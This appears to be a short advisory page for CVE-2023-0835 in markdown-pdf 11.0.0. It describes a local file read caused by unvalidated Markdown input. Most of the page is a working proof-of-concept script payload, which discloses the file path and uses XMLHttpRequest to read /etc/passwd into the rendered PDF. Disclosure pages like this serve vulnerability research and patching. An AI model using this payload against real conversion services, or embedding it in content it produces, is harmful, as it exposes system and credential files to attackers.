markdown-pdf - CVE-2023-0835

markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.


PoC || GTFO

<script>
 // Path Disclosure
 document.write(window.location);
 // Arbitrary Local File Read
 xhr = new XMLHttpRequest;
 xhr.onload=function(){document.write((this.responseText))};
 xhr.open("GET","file:///etc/passwd");
 xhr.send();
</script>

Last updated

Was this helpful?